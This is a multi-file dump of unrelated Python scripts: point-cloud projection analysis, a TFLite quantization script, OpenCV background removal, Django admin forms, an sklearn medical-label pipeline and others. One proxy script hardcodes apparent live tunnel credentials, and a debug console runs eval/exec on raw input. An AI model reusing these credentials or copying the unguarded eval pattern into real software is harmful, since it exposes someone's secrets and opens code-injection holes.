                    point_cloud1 = self.full_dataset["data"][time_step][index, :3]
                    point_cloud2 = self.full_dataset["data"][time_step + 1][index, :3]
                    point_cloud3 = self.full_dataset["data"][time_step + 2][index, :3]
                    pressure = self.full_dataset["data"][time_step + 1][index, 3] * 0.0001
                    normal = self.full_dataset["data"][time_step + 1][index, 4:]
                    # pressure assumed to have the same direction as the acceleration
                    dx1 = point_cloud2 - point_cloud1
                    dx2 = point_cloud3 - point_cloud2
                    dx = 0.5 * (dx1 + dx2)
                    v = dx / t
                    a_ = (dx2 - dx1) / t ** 2
                    Ax[time_step, 0] = abs(a_[0])
                    Ax[time_step, 1] = v[0]
                    Bx[time_step] = abs(pressure * normal[0])
                    Ay[time_step, 0] = abs(a_[1])
                    Ay[time_step, 1] = v[1]
                    By[time_step] = abs(pressure * normal[1])
                    Az[time_step, 0] = abs(a_[2])
                    Az[time_step, 1] = v[2]
                    Bz[time_step] = abs(pressure * normal[2])
                    A[time_step, 0] = np.linalg.norm(a_) * 1
                    A[time_step, 1] = np.linalg.norm(v) * ((a_ / np.linalg.norm(a_)) @ (v / np.linalg.norm(v)))
                    B[time_step] = np.linalg.norm(pressure * normal @ (a_ / np.linalg.norm(a_)))
                ans_x = np.linalg.solve(Ax.T @ Ax, Ax.T @ Bx)
                self.ode_data_x.append([float(ans_x[0]), float(ans_x[1])])
                ans_y = np.linalg.solve(Ay.T @ Ay, Ay.T @ By)
                self.ode_data_y.append([float(ans_y[0]), float(ans_y[1])])
                ans_z = np.linalg.solve(Az.T @ Az, Az.T @ Bz)
                self.ode_data_z.append([float(ans_z[0]), float(ans_z[1])])
                self.ode_data_norm.append([np.sqrt(
                    ans_x[0] ** 2 + ans_y[0] ** 2 + ans_z[0] ** 2),
                    np.sqrt(ans_x[1] ** 2 + ans_y[1] ** 2 + ans_z[1] ** 2)])
                ans_chen = np.linalg.solve(A.T @ A, A.T @ B)
                self.ode_data_chen.append([float(ans_chen[0]), float(ans_chen[1])])
            save_data(self.ode_data_x, "m-mu-x")
            save_data(self.ode_data_y, "m-mu-y")
            save_data(self.ode_data_z, "m-mu-z")
            save_data(self.ode_data_norm, "m-mu-norm")
            save_data(self.ode_data_chen, "m-mu-norm-c")
            pass
        pass
def analysis_ensemble_kalman_filter(self):
self.dataset = self.dataset
print("Here is DataManager.Analysis.DeepAnalysis.analysis_ensemble_kalman_filter!")
# TODO EnKF model
# TODO save analyzed data
pass
class Preprocessor(Analysis):
    """Pre-processing stage: searches for the viewing direction whose 2-D
    projection of the point cloud best matches a reference shape image
    (see project())."""

    def __init__(self, data_name):
        # data_name: case identifier forwarded to the Analysis base class.
        super().__init__(data_name)
        # The literal below is the author's algorithm sketch for project();
        # it is a no-op expression statement kept as in-source documentation.
        """
        p0=(x0,y0,z0)
        v0=(ex,ey,ez)
        p(x,y,z)
        ((p+k*v0)-p0)@v0=0
        ==>k=(p0-p)@v0/|v0|
        ==>p`=p+k*v0
        v0:(rcost,rsint,sqrt(1-r**2)), r in (0,1), t in (0,2pi)
        p0:R*v0 + C(x~,y~,z~), Any constant R > max(|p-C|)
        for p in geometry:
            calculate p`
        for all p`:
            c`=avg(p`)
        create resolution image
        find maxlikelyhood distance(spin the image and calculate costfunction)
        iteration until r and t calculated
        figure out least cost
        that direction is required
        cost function:
            cost = sum(0.5*sin(pi/180)*(cd-ab))
            a,b,c,d = p1-c`,p2-c`,p3-c`,p4-c`
        """
    def project(self):
        """Search (r, t) viewing directions whose projected point cloud best
        matches the boundary of the reference image "M02shape.png".

        Pipeline: (1) extract the reference shape boundary with a Laplacian
        kernel; (2) for each candidate direction, project the 3-D points onto
        a plane, thin the projected boundary, pair boundary points with image
        points by direction, and (3) iteratively rescale while scoring with
        a spin-invariant cost; the cheapest (r, t) is reported.
        NOTE(review): indentation of the original file was lost; the nesting
        below is a reconstruction -- verify against the author's intent.
        """
        from PIL import Image
        import numpy as np
        raw_image = Image.open("M02shape.png")
        image = np.array(raw_image, dtype=np.int32)
        # Zero-pad by one pixel so the 3x3 kernel can slide over the borders.
        pad = np.zeros([image.shape[0] + 2, image.shape[1] + 2])
        for i in range(image.shape[0]):
            for j in range(image.shape[1]):
                # Pure white (255,255,255) is background; everything else is shape.
                if image[i, j, 0] == image[i, j, 1] == image[i, j, 2] == 255:
                    pass
                else:
                    pad[i + 1, j + 1] = 255
        # 3x3 Laplacian-style kernel: strong response on shape boundaries.
        kernel = np.reshape(np.array([-1, -1, -1, -1, 8, -1, -1, -1, -1]), [9, 1])
        boundary_image = np.zeros([image.shape[0], image.shape[1]])
        for i in range(boundary_image.shape[0]):
            for j in range(boundary_image.shape[1]):
                value = np.reshape(pad[i:i + 3, j:j + 3], [1, 9]) @ kernel
                boundary_image[i, j] += value
        # First frame of every slice, flattened into (x, y, z) triples.
        data = [self.data[key][0] for key in self.data.keys()]
        data = [i[3 * j:3 * j + 3] for i in data for j in range(int(len(i) / 3 - 1))]
        data = np.array(data, dtype=np.float32)
        r_ = [0.1 * i for i in range(1, 11)]  # 0.1-1
        t_ = [3.141592653589793 / 30 * i for i in range(60)]  # 0-2pi
        # Centroid of the point cloud; projection plane sits R along v0 from it.
        c = np.array([np.mean(data[:, 0]), np.mean(data[:, 1]), np.mean(data[:, 2])])
        R = 100
        cost_ans = []
        project_log = []
        for r in r_:
            for t in t_:
                """
                def the vector vertical with v0 and have max projection on z-axis as 'base yaxis' for image
                x=-cos(t)*sqrt((1-r**2))
                y=-sin(t)*sqrt((1-r**2))
                z=r
                def the vector vertical with v0, 'base yaxis' and satisfy right hand rule
                x=-sin(t)
                y=-cos(t)
                z=0
                """
                v0 = np.array([r * np.cos(t), r * np.sin(t), np.sqrt(1 - r ** 2)])  # the other is -np.sqrt(1-a**2)
                base_y_axis = np.array([-np.cos(t) * np.sqrt(1 - r ** 2), -np.sin(t) * np.sqrt(1 - r ** 2), r])
                base_x_axis = np.array([-np.sin(t), np.cos(t), 0])
                p0 = R * v0 + c
                # Orthogonal projection of every point onto the plane through p0.
                shadow = [p + (p0 - p) @ v0 * v0 for p in data]
                shadow = np.array(shadow, dtype=np.float32)  # all points on a plane
                center = np.array([np.mean(shadow[:, 0]), np.mean(shadow[:, 1]), np.mean(shadow[:, 2])])
                image_array = np.zeros([548, 870])  # size of operation image
                image_center = [548 / 2, 870 / 2]  # center of operation image boundary
                relative_shadow = np.array([shadow[i] - center for i in range(shadow.shape[0])],
                                           dtype=np.float32)  # delta x,y,z
                # convert 3d(x,y,z) to 2d(x,y) by projecting onto the in-plane axes
                temp = np.array([[item @ base_x_axis, item @ base_y_axis] for item in relative_shadow])
                dx = np.max(temp[:, 0]) - np.min(temp[:, 0])
                dy = np.max(temp[:, 1]) - np.min(temp[:, 1])
                resolution = min(dx, dy) / max(boundary_image.shape)
                # Collect reference-boundary pixels as 2-D points in world units;
                # (435, 274) appears to be the image's assumed center -- TODO confirm.
                image_temp = []
                for i in range(boundary_image.shape[0]):
                    for j in range(boundary_image.shape[1]):
                        if boundary_image[i, j] >= 200:
                            image_temp.append([(j - 435) * resolution, (274 - i) * resolution])
                # clear rubbish: walk the boundary point-to-point, dropping
                # near-duplicates; stops when no neighbor within 4*resolution.
                opt_array = np.array(image_temp)
                start_point = np.array([np.max(opt_array[:, 0]), 0])
                clean_list = [start_point]
                while True:
                    max_distance = 0
                    selected_point = 0
                    cache = []
                    for step, point in enumerate(image_temp):
                        point = np.array(point)
                        d = np.linalg.norm(point - start_point)
                        if 4 * resolution > d:  # 4 is experience
                            cache.append(step)
                        if 4 * resolution > d > max_distance:
                            selected_point = point
                            max_distance = d
                    try:
                        # selected_point stays int 0 when no neighbor was found.
                        assert type(selected_point) is np.ndarray
                        clean_list.append(selected_point)
                        cache.reverse()
                        for item in cache:
                            image_temp.pop(item)
                        start_point = selected_point
                    except AssertionError:
                        break
                print("clean_list_test_length:", len(clean_list))
                # move image-center to center
                image_temp = np.array(clean_list)
                movement = np.array([np.mean(image_temp[:, 0]), np.mean(image_temp[:, 1])])
                for i in range(image_temp.shape[0]):
                    image_temp[i] -= movement
                # debug dump: projected cloud tagged 1, cleaned boundary tagged 2
                debug = []
                for dbg in temp:
                    debug.append([dbg[0], dbg[1], 0, 1])
                for dbg in image_temp:
                    debug.append([dbg[0], dbg[1], 0, 2])
                import csv
                with open("test{}-{}.csv".format(r, t), "w", newline="") as f:
                    csv_writer = csv.writer(f)
                    for row in debug:
                        csv_writer.writerow(row)
                print("image range:", np.max(image_temp[:, 0]), np.min(image_temp[:, 0]), np.max(image_temp[:, 1]),
                      np.min(image_temp[:, 1]))
                # TODO calculate cost function
                # Pair each boundary point with the farthest projected point
                # lying in the same quadrant close to the same ray from origin.
                point_pairs = []
                for i in range(image_temp.shape[0]):
                    p0 = image_temp[i]
                    x0 = p0[0]
                    y0 = p0[1]
                    max_distance = 0
                    p1 = 0
                    for item in temp:
                        x = item[0]
                        y = item[1]
                        if np.sign(x0) == np.sign(x) and np.sign(y0) == np.sign(y):
                            # |cross product| small => item is near the ray through p0.
                            if abs(y0 * (x - x0) - x0 * (y - y0)) <= 3 * resolution:
                                d = np.linalg.norm(item)
                                if d > max_distance:
                                    p1 = item
                                    max_distance = d
                    try:
                        assert type(p1) is np.ndarray
                        point_pairs.append([p0, p1])
                    except AssertionError:
                        # No partner found for this boundary point: abort this pairing.
                        raise AssertionError
                print("pairs length:", len(point_pairs))
                # cost function: spin the boundary through 360 degrees, score the
                # area mismatch between consecutive pairs, and rescale iteratively.
                last = 0
                times = 0
                res = []
                log = []
                while True:
                    cost_list = []
                    # NOTE(review): scale_history is reset to 1 every iteration, so
                    # log records only the latest factor, not the cumulative scale
                    # -- confirm whether that is intended.
                    scale_history = 1
                    for theta in [np.pi / 180 * i for i in range(360)]:
                        spin = np.array([[np.cos(theta), -np.sin(theta)],
                                         [np.sin(theta), np.cos(theta)]])
                        cost = 0
                        for i in range(len(point_pairs) - 1):
                            p1, p3 = point_pairs[i].copy()
                            p2, p4 = point_pairs[i + 1].copy()
                            p1 = spin @ p1
                            p2 = spin @ p2
                            cost += abs(np.sin(np.pi * 2 / len(point_pairs)) *
                                        (np.linalg.norm(p3) * np.linalg.norm(p4) -
                                         np.linalg.norm(p1) * np.linalg.norm(p2)))
                        cost_list.append(cost)
                    print(min(cost_list))
                    if times == 0:
                        # First pass: just record the cost and grow by 10%.
                        last = min(cost_list)
                        times += 1
                        scale_factor = 1.1
                        scale_history *= scale_factor
                        for i in range(len(point_pairs)):
                            point_pairs[i][0] *= scale_factor
                    else:
                        # Reverse direction when the cost got worse.
                        if min(cost_list) >= last:
                            scale_factor = 1 / scale_factor
                        if min(cost_list) <= last:
                            scale_factor = scale_factor  # no-op, kept as written
                        scale_history *= scale_factor
                        for i in range(len(point_pairs)):
                            point_pairs[i][0] *= scale_factor
                        last = min(cost_list)
                        times += 1
                    res.append(last)
                    log.append([cost_list.index(min(cost_list)) * np.pi / 180, scale_history])  # theta, scale-history
                    if times == 20:
                        break
                cost = int(min(res))
                cost_ans.append(cost)
                project_log.append([r, t, resolution, movement, *log[res.index(min(res))]])
        print("min(cost_ans)")
        print(min(cost_ans))
        print(cost_ans)
        print(min(cost_ans))
        print(res)
        print(cost_list)
        # analysis cost:
        # NOTE(review): indexing project_log with cost_list (the last inner
        # 360-theta cost table) looks wrong -- cost_ans.index(min(cost_ans))
        # was probably intended; verify before relying on these values.
        r0 = project_log[cost_list.index(min(cost_list))][0]
        t0 = project_log[cost_list.index(min(cost_list))][1]
        resolution = project_log[cost_list.index(min(cost_list))][2]
        move_vector = project_log[cost_list.index(min(cost_list))][3]
        theta = project_log[cost_list.index(min(cost_list))][4]
        scale_factor = project_log[cost_list.index(min(cost_list))][5]
        print("r", r0, "t", t0, "resolution", resolution, "move", move_vector, "spin-angle", theta, "scale",
              scale_factor)
        # Disabled earlier rasterization experiment, kept verbatim as a string.
        """
        import csv
        with open("test1.csv", "w", newline="") as f:
            csv_writer = csv.writer(f)
            for i in range(temp.shape[0]):
                csv_writer.writerow(temp[i])
            for i in range(image_temp.shape[0]):
                csv_writer.writerow(image_temp[i])
        dx = np.max(shadow[:, 0]) - np.min(shadow[:, 0])
        dy = np.max(shadow[:, 1]) - np.min(shadow[:, 1])
        dz = np.max(shadow[:, 2]) - np.min(shadow[:, 2])
        resolution = np.sqrt(dx**2+dy**2+dz**2) / min(image_array.shape) # length of tiny square
        theta = [np.pi*2/2001*i for i in range(2000)]
        temp = [[item @ base_x_axis, item @ base_y_axis] for item in relative_shadow] # TODO important change 3d to 2d point cloud
        index = []
        for i in theta:
            max_distance = 0
            point_index = 0
            for step, j in enumerate(temp):
                if np.tan(i)<=j[1]/j[0]<=np.tan(i+np.pi*2/2001):
                    distance = j[0]**2+j[1]**2
                    if distance>max_distance:
                        point_index = step
                        max_distance = distance
            index.append(point_index)
        print(index)
        print(len(index))
        votex = np.sqrt(3) / 3 * resolution
        subsample = [shadow[i*10] for i in range(shadow.shape[0]//10)]
        # up=274 down=273 left=435 right=434
        for i in range(image_array.shape[0]):
            for j in range(image_array.shape[1]):
                cell_center = center + base_y_axis * resolution * (274-i) + base_x_axis * resolution * (j-435)
                min_x = cell_center[0] - votex
                max_x = cell_center[0] + votex
                min_y = cell_center[1] - votex
                max_y = cell_center[1] + votex
                min_z = cell_center[2] - votex
                max_z = cell_center[2] + votex
                for d in index:
                    point = shadow[d]
                    if min_x <= point[0] <= max_x and min_y <= point[1] <= max_y and min_z <= point[2] <= max_z:
                        image_array[i, j] = 255
            if i%100==0:
                from PIL import Image
                image = Image.fromarray(image_array)
                image.show()
        """
class Console:
    """Minimal interactive Python console: eval/exec whatever the user types."""

    def __init__(self):
        # Starts the read-eval-print loop immediately on construction.
        self.console()
        pass

    def console(self):
        """Run the REPL; typing 'exit' or 'quit' leaves the loop."""
        print("This is a python console, call Gui() to enter your code.")
        print("Code saved as '.text' attribute of Gui object.")
        import traceback
        while True:
            my_code = input(">>>")
            if my_code == "exit" or my_code == "quit":
                break
            try:
                execute_times = 0
                try:
                    # Try the input as an expression first so its value can be shown.
                    answer = eval(my_code)
                    if answer is not None:
                        print(answer)
                    execute_times += 1
                except:
                    # Not a valid expression; fall through to exec below.
                    pass
                if execute_times == 0:
                    # SECURITY: eval/exec on raw input -- acceptable for a local
                    # debug console only; never expose to untrusted input.
                    exec(my_code)
            except:
                traceback.print_exc()
        return
class Gui:
    """Tiny tkinter text editor.

    Clicking "apply" stores the editor contents in self.text. restart()
    opens a fresh window with the same layout.
    """

    def __init__(self):
        self.text = None  # last applied editor contents (str) or None
        self._build_window()

    def _build_window(self):
        """Create the editor window and block in the tk main loop.

        Extracted because __init__ and restart() previously duplicated
        this construction code line for line.
        """
        import tkinter
        root = tkinter.Tk()
        root.geometry("300x450")
        root.title("Text Editor")
        self.inbox = tkinter.Text(root, width=42, height=32)
        button1 = tkinter.Button(root, text="apply", width=41)
        self.inbox.place(x=0, y=0)
        button1.place(x=0, y=420)
        button1.bind('<Button-1>', lambda event: self.get_data(event))
        root.mainloop()

    def get_data(self, event):
        # Text widget's 'end' index includes a trailing newline.
        self.text = self.inbox.get('1.0', 'end')

    def restart(self):
        """Open a fresh editor window (same layout as the initial one)."""
        self._build_window()
# Script driver: build the preprocessor for the "Mie02" case, run the
# projection search, then drop into the interactive console.
a = Preprocessor("Mie02")
a.project()
Console()
|
import torch.utils.data
import torch
from torch.utils.data import Dataset
class Data_Utility(Dataset):
    """Sliding-window dataset over a 1-D numpy series.

    Each sample pairs a `time_steps`-long input window with the
    `time_steps - encode_length` values that immediately follow it.
    Items are dicts: {'inputs': Tensor, 'outputs': Tensor}.
    """

    def __init__(self, input_size, output_size, encode_length, time_steps, data):
        self.input_size = input_size
        self.output_size = output_size
        self.time_steps = time_steps
        self.encode_length = encode_length
        window = time_steps
        horizon = time_steps - encode_length
        n_samples = len(data) - window - horizon
        ins = torch.zeros((n_samples, window))
        outs = torch.zeros((n_samples, horizon))
        for start in range(n_samples):
            stop = start + window
            ins[start, :] = torch.from_numpy(data[start:stop])
            outs[start, :] = torch.from_numpy(data[stop:stop + horizon])
        # Add a trailing feature dimension so shapes are (N, T, features).
        self.inputs = torch.reshape(ins, (n_samples, window, self.input_size))
        self.outputs = torch.reshape(outs, (n_samples, horizon, self.output_size))

    def __getitem__(self, index):
        return {
            'inputs': self.inputs[index],
            'outputs': self.outputs[index],
        }

    def __len__(self):
        return self.inputs.shape[0]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 16 14:01:22 2020
@author: base
#--------------------------------
# If the link to the model should fail , it can be loaded and save with the following:
import subprocess
import sys
def install(package):
    subprocess.check_call([sys.executable, "-m", "pip", "install", package])
install("git+https://github.com/rcmalli/keras-vggface.git")
from keras_vggface.vggface import VGGFace
pretrained_model = VGGFace(model='resnet50', include_top=False, input_shape=(224, 224, 3), pooling='avg') # pooling: None, avg or max
#pretrained_model.summary()
pretrained_model.save("my_model.h5") #using h5 extension
#-----------------------
"""
import tensorflow as tf
import cv2
from keras_vggface.utils import preprocess_input
import numpy as np
from pathlib import Path
print(tf.version.VERSION)
if tf.__version__.startswith('1.15'):
    # This prevents some errors that otherwise occur when converting the model with TF 1.15...
    tf.enable_eager_execution()  # Only if TF is version 1.15
path_to_model=Path('my_model.h5')
path_to_img=Path('000002.jpg')
print(tf.version.VERSION)
if path_to_model.is_file():
    # Pick the converter entry point matching the installed TF major version.
    if tf.__version__.startswith('2.'):
        converter = tf.compat.v1.lite.TFLiteConverter.from_keras_model_file(path_to_model)  # works now also with TF2.x
    if tf.__version__.startswith('1.'):
        converter = tf.lite.TFLiteConverter.from_keras_model_file(path_to_model)
else:
    # NOTE(review): when the model file is missing, `converter` stays
    # undefined and the conversion below raises NameError.
    print('Please add the my_model.h5 to the working directory or change the path')
def representative_dataset_gen():
    """Yield a few preprocessed sample images for post-training quantization.

    The TFLite converter calls this to calibrate int8 ranges; yields the
    same image ten times, preprocessed the same way as at training time.
    """
    if path_to_img.is_file():
        for _ in range(10):
            # Fix: cv2.imread expects a string path; passing a pathlib.Path
            # raises TypeError on older OpenCV builds.
            img = cv2.imread(str(path_to_img))
            img = np.expand_dims(img, axis=0).astype('float32')
            img = preprocess_input(img, version=2)
            yield [img]
    else:
        print('Please add the example image or a 224x224 image to the working directory or change the path')
# Configure full-integer (int8) quantization for the converted model.
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.representative_dataset = representative_dataset_gen
converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8]
converter.experimental_new_converter = True
converter.target_spec.supported_types = [tf.int8]
converter.inference_input_type = tf.int8
converter.inference_output_type = tf.int8
quantized_tflite_model = converter.convert()
# Write the flatbuffer under a TF-version-specific name.
# NOTE(review): file handles are not closed explicitly; use `with` if revised.
if tf.__version__.startswith('1.'):
    open("tf1_15_3_all_int8.tflite", "wb").write(quantized_tflite_model)
if tf.__version__.startswith('2.'):
    open("tf220_all_int8.tflite", 'wb') .write(quantized_tflite_model)  # 220 vs 2_2_0; I had added dtype int32 and int8 in the model code. Removed again now.
""" Module for removing background from image as a pre-processing step"""
import numpy as np
import cv2 as cv
def crop_image(img):
    """Crop `img` (BGR) to the bounding box of its largest non-white region.

    Also writes the crop to "001.png" as a side effect, as before.
    """
    # Anything darker than near-white (<= 240) becomes foreground.
    gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
    _, threshed = cv.threshold(gray, 240, 255, cv.THRESH_BINARY_INV)
    # Morphological closing fills small holes so the object forms one contour.
    kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (11, 11))
    morphed = cv.morphologyEx(threshed, cv.MORPH_CLOSE, kernel)
    # findContours returns differently-shaped tuples across OpenCV versions;
    # the contour list is always the second-to-last element.
    contours = cv.findContours(morphed, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)[-2]
    largest = sorted(contours, key=cv.contourArea)[-1]
    x, y, w, h = cv.boundingRect(largest)
    cropped = img[y:y + h, x:x + w]
    cv.imwrite("001.png", cropped)
    return cropped
def remove_background(img):
    """Zero out the background of `img` using GrabCut with a fixed rectangle."""
    mask = np.zeros(img.shape[:2], np.uint8)
    bgd_model = np.zeros((1, 65), np.float64)
    fgd_model = np.zeros((1, 65), np.float64)
    # Rectangle assumed to contain the subject -- same hard-coded region as before.
    rect = (50, 50, 450, 290)
    cv.grabCut(img, mask, rect, bgd_model, fgd_model, 5, cv.GC_INIT_WITH_RECT)
    # GrabCut marks background as 0 and probable background as 2; keep the rest.
    keep = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8')
    return img * keep[:, :, np.newaxis]
def main():
    """Crop the test image, strip its background and display the result."""
    img = cv.imread("TestImages/1.jpg")
    img = crop_image(img)
    img = remove_background(img)
    # Fix: cv.imshow requires a window name as the first argument; the
    # original called cv.imshow(img), which raises TypeError at runtime.
    cv.imshow("result", img)
    cv.waitKey(0)
# Script entry point.
if __name__ == "__main__":
    main()
|
from codec import dump, dumps, load, loads
from codec import GeoJSONEncoder
from geometry import Point, LineString, Polygon
from geometry import MultiLineString, MultiPoint, MultiPolygon
from geometry import GeometryCollection
from feature import Feature, FeatureCollection
from base import GeoJSON
|
#!/usr/bin/env python
import sys
from sets import Set
# Deduplicate the lines of <dataset> and write the unique lines to <output>.
if len(sys.argv) != 3:
    print("Usage: {} <dataset> <output>".format(sys.argv[0]))
    print(" dataset: File containing the data whose duplicates will be "
          "removed.")
    print(" output: File where output data will be stored.")
    exit(1)
else:
    # Fix: use `with` so the files are closed even on error, and the builtin
    # `set` instead of the long-deprecated (removed in Python 3) sets.Set.
    with open(sys.argv[1], 'r') as dataset:
        lines = dataset.readlines()
    no_dups = set(lines)
    print(" Size with duplicates: %d" % len(lines))
    print(" Size without duplicates: %d" % len(no_dups))
    # Note: set iteration order is arbitrary, matching the old Set behavior.
    with open(sys.argv[2], 'w') as output:
        for l in no_dups:
            output.write(l)
|
from typing import Any, IO, Text
import io
class GzipFile(io.BufferedIOBase):
    """Type stub for the Python 2 gzip.GzipFile file-like object."""
    # Attribute stubs mirror the runtime class; `# type:` comments are the
    # Python 2 stub annotation style used throughout this file.
    myfileobj = ...  # type: Any
    max_read_chunk = ...  # type: Any
    mode = ...  # type: Any
    extrabuf = ...  # type: Any
    extrasize = ...  # type: Any
    extrastart = ...  # type: Any
    name = ...  # type: Any
    min_readsize = ...  # type: Any
    compress = ...  # type: Any
    fileobj = ...  # type: Any
    offset = ...  # type: Any
    mtime = ...  # type: Any
    def __init__(self, filename: str = ..., mode: Text = ..., compresslevel: int = ...,
                 fileobj: IO[str] = ..., mtime: float = ...) -> None: ...
    @property
    def filename(self): ...
    size = ...  # type: Any
    crc = ...  # type: Any
    def write(self, data): ...
    def read(self, size=...): ...
    @property
    def closed(self): ...
    def close(self): ...
    def flush(self, zlib_mode=...): ...
    def fileno(self): ...
    def rewind(self): ...
    def readable(self): ...
    def writable(self): ...
    def seekable(self): ...
    def seek(self, offset, whence=...): ...
    def readline(self, size=...): ...
# Stub for gzip.open(): returns a GzipFile wrapping the named file.
def open(filename: str, mode: Text = ..., compresslevel: int = ...) -> GzipFile: ...
|
from flask import Flask
from flaskext.sqlalchemy import SQLAlchemy
import archie.config
# startup and utils
app = Flask(__name__)
# NOTE(review): TestingConfig is hardwired here -- confirm this module is
# never imported by a production entry point.
app.config.from_object(archie.config.TestingConfig)
db = SQLAlchemy(app)  # shared SQLAlchemy handle used by the app's models
# Imported for their side effects (route and model registration).
import archie.views
import archie.install
# recreate the db from scratch
# NOTE(review): runs at import time and rebuilds the database.
archie.install.begin()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Ziga Vucko'
from os.path import basename
from sys import argv
import time
from Util import Logger, Config, Batch, NELLDict, FeaturePreprocessor
t0 = time.time()  # wall-clock start for the summary log line at the end
logger = Logger(type_='bp')  # 'bp' = batch preprocessor
config = Config(logger=logger)
config.load()
# NELL entity dictionary; updated below with entities from this batch.
nell = NELLDict(logger=logger, trace=True)
nell.load()
# Load and clean the batch of articles for iteration config.iter_bp.
batch = Batch(logger=logger, n=config.iter_bp)
batch.clean()
batch.load()
nell.update(batch.article_dict)
# Turn the batch's articles into feature vectors using the NELL categories.
features_batch = FeaturePreprocessor(logger=logger, type_='batch', n=config.iter_bp)
features_batch.transform(batch.article_dict, nell.entity_categories)
config.stop('bp')  # indicate that the batch preprocessor is finished
logger('%s executed successfully in %.2f s.' % (basename(argv[0]), time.time() - t0))
|
from django import forms
from django.contrib import admin
from .models import Card
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.models import User
from .models import Profile
# Define an inline admin descriptor for Employee model
# which acts a bit like a singleton
class ProfileInline(admin.StackedInline):
    """Edit a user's Profile inline on the User admin page."""
    model = Profile
    can_delete = False  # a user's profile cannot be removed from the admin
    verbose_name_plural = 'profile'
class UserAdmin(BaseUserAdmin):
    """Django's default user admin extended with the Profile inline."""
    inlines = (ProfileInline,)
class CardAdminForm(forms.ModelForm):
    """Admin form for Card: which fields are required depends on card_type."""

    class Meta:
        model = Card
        exclude = ('owner', 'last_bid',)

    # Required fields per card type, checked in this order; the message is
    # raised for the first one that is missing (same order as before).
    _REQUIRED_BY_TYPE = {
        "Player": (
            ('icc_ranking', "Enter the ICC Ranking"),
            ('country', "Enter the Country"),
            ('ipl_team', "Enter the IPL Team"),
        ),
        "Country": (
            ('icc_ranking', "Enter the ICC Ranking"),
        ),
    }

    def clean(self):
        data = self.cleaned_data
        card_type = data.get('card_type')
        for field, message in self._REQUIRED_BY_TYPE.get(card_type, ()):
            if not data.get(field):
                raise forms.ValidationError(message)
        return data
# 0-Board; 1-Country; 2-Rest
class CardAdmin(admin.ModelAdmin):
    """Card admin that assigns the starting bid by card type on save."""
    form = CardAdminForm

    # Starting bid per card type; anything unlisted falls back to 0.005,
    # matching the original Board/else behavior.
    _STARTING_BIDS = {"Board": 0.005, "Country": 0.007}

    def save_model(self, request, obj, form, change):
        card_type = form.cleaned_data['card_type']
        obj.last_bid = self._STARTING_BIDS.get(card_type, 0.005)
        super().save_model(request, obj, form, change)
# Swap Django's stock User admin for ours (with the Profile inline),
# and register the Card model with its custom admin.
admin.site.unregister(User)
admin.site.register(User, UserAdmin)
admin.site.register(Card, CardAdmin)
|
# encoding: utf-8
import requests
def main():
    """Fetch a test page through the Abuyun HTTP proxy tunnel and print the
    response status and body."""
    import requests
    # Target page to fetch.
    targetUrl = "http://test.abuyun.com"
    # targetUrl = "http://proxy.abuyun.com/switch-ip"
    # targetUrl = "http://proxy.abuyun.com/current-ip"
    # Proxy server.
    proxyHost = "http-pro.abuyun.com"
    proxyPort = "9010"
    # Proxy tunnel credentials.
    # NOTE(review): credentials are hardcoded and committed -- move them to
    # configuration/environment and rotate these secrets.
    proxyUser = "H2S5599U2AHJ83LP"
    proxyPass = "B096A6369FF333EC"
    proxyMeta = "http://%(user)s:%(pass)s@%(host)s:%(port)s" % {
        "host": proxyHost,
        "port": proxyPort,
        "user": proxyUser,
        "pass": proxyPass,
    }
    proxies = {
        "http": proxyMeta,
        "https": proxyMeta,
    }
    # Ask the proxy service to switch to a fresh IP for this request.
    header={
        "Proxy-Switch-Ip":"yes"
    }
    resp = requests.get(targetUrl, proxies=proxies,headers=header)
    print(resp.status_code)
    print(resp.text)
    # a=resp.text.split(',')
    # print(a)
    # targetUrl1="http://test.abuyun.com"
    # https_proxies={
    #     "http":"%s:%s"%(a[0],proxyPort),
    #     "https":"%s:%s" % (a[0], proxyPort)
    # }
    #
    # print("Proxy IP is %s"%https_proxies)
    # resp1=requests.get(targetUrl1,proxies=https_proxies)
    #
    # print(resp1.status_code)
    # print(resp1.text)
    #
#
# Script entry point.
if __name__ == '__main__':
    main()
import numpy as np
import pandas as pd
from sklearn.pipeline import make_pipeline
from sklearn.experimental import enable_hist_gradient_boosting
from sklearn.ensemble import HistGradientBoostingClassifier, HistGradientBoostingRegressor
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import StandardScaler
import sklearn.metrics as metrics
# Load the raw patient time-series features and the per-patient labels.
train_data = pd.read_csv('./datasets/train_features.csv')
labels = pd.read_csv('./datasets/train_labels.csv')
test_data = pd.read_csv('./datasets/test_features.csv')
def features_engineering(data, n):
    """Collapse each block of n consecutive rows into one feature vector.

    For every patient (n rows), computes NaN-aware median, mean, variance,
    min and max of each measurement column (columns 2 onward) and
    concatenates them into a single flat vector.
    Returns an array of shape (num_patients, 5 * num_measurement_columns).
    """
    stats = (np.nanmedian, np.nanmean, np.nanvar, np.nanmin, np.nanmax)
    n_patients = int(data.shape[0] / n)
    rows = []
    for p in range(n_patients):
        block = data[p * n:(p + 1) * n, 2:]
        per_stat = [stat(block, axis=0) for stat in stats]
        rows.append(np.concatenate(per_stat))
    return np.array(rows)
# Each patient contributes 12 consecutive rows of measurements.
x_train = features_engineering(train_data.to_numpy(), 12)
x_test = features_engineering(test_data.to_numpy(), 12)
# Task 1: per-label binary classification (will each lab test be ordered?).
task1_labels = ['LABEL_BaseExcess', 'LABEL_Fibrinogen', 'LABEL_AST', 'LABEL_Alkalinephos', 'LABEL_Bilirubin_total',
                'LABEL_Lactate', 'LABEL_TroponinI', 'LABEL_SaO2', 'LABEL_Bilirubin_direct', 'LABEL_EtCO2']
y_train = labels[task1_labels].to_numpy()
pipeline = make_pipeline(SimpleImputer(strategy='median'), StandardScaler(), HistGradientBoostingClassifier(l2_regularization=1.0))
# for i, label in enumerate(task1_labels):
#     scores = cross_val_score(pipeline, x_train, y_train[:, i], cv=5, scoring='roc_auc', verbose=True)
#     print("Cross-validation score is {score:.3f},"
#           " standard deviation is {err:.3f}"
